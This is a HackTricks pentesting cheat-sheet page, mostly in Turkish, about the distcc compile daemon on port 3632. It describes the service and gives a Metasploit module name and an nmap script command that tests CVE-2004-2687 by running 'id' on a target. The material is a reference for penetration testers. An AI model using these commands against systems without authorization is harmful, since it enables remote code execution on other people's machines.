hacktricks/network-services-pentesting/3632-pentesting-distcc.md

{% hint style="success" %} AWS Hacking'i öğrenin ve pratik yapın:HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)

HackTricks'i Destekleyin

• abonelik planlarını kontrol edin!
• 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
• Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

{% endhint %}

Temel Bilgiler

Distcc, ağdaki diğer bilgisayarların boş işlem gücünü kullanarak derleme sürecini geliştiren bir araçtır. distcc bir makinede kurulduğunda, bu makine derleme görevlerini başka bir sisteme dağıtma yeteneğine sahiptir. Bu alıcı sistem, gönderilen kodu işlemek için distccd daemon'unu çalıştırmalı ve uyumlu bir derleyici kurulu olmalıdır.

Varsayılan port: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Exploitation

CVE-2004-2687'ye karşı savunmasız olup olmadığını kontrol edin, rastgele kod çalıştırmak için:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Bu hizmeti shodan'ın tespit ettiğini düşünmüyorum.

Resources

• https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
• https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855

Post created by Álex B (@r1p)

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}